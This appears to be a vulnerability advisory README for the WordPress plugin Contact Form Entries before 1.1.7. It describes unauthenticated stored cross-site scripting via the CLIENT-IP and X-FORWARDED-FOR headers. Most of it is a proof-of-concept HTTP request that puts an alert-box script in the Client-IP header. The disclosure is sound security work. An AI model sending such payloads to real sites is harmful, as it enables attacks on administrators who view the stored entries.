.. | |||
README.md | Loading last commit info... |
README.md
Contact Form Entries < 1.1.7 - Unauthenticated Stored Cross-Site Scripting
Description
The plugin does not validate, sanitise and escape the IP address retrieved via headers such as CLIENT-IP and X-FORWARDED-FOR, allowing unauthenticated attackers to perform Cross-Site Scripting attacks against logged in admins viewing the created entry
Proof of Concept
POST /wp-json/contact-form-7/v1/contact-forms/1376/feedback HTTP/1.1
Accept: application/json, */*;q=0.1
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------9885500162977152723644841236
Content-Length: 963
Connection: close
Client-IP: <script>alert(/XSS/)</script>
Cookie: vx_user=61c2ecea43ad6164016458635903967
-----------------------------9885500162977152723644841236
Content-Disposition: form-data; name="_wpcf7"
1376
-----------------------------9885500162977152723644841236
Content-Disposition: form-data; name="_wpcf7_version"
5.5.3
-----------------------------9885500162977152723644841236
Content-Disposition: form-data; name="_wpcf7_locale"
en_US
-----------------------------9885500162977152723644841236
Content-Disposition: form-data; name="_wpcf7_unit_tag"
wpcf7-f1376-p1701-o1
-----------------------------9885500162977152723644841236
Content-Disposition: form-data; name="_wpcf7_container_post"
1701
-----------------------------9885500162977152723644841236
Content-Disposition: form-data; name="_wpcf7_posted_data_hash"
3e8ce0f47face5a3318813e733c3c774
-----------------------------9885500162977152723644841236
Content-Disposition: form-data; name="text-42"
Test
-----------------------------9885500162977152723644841236--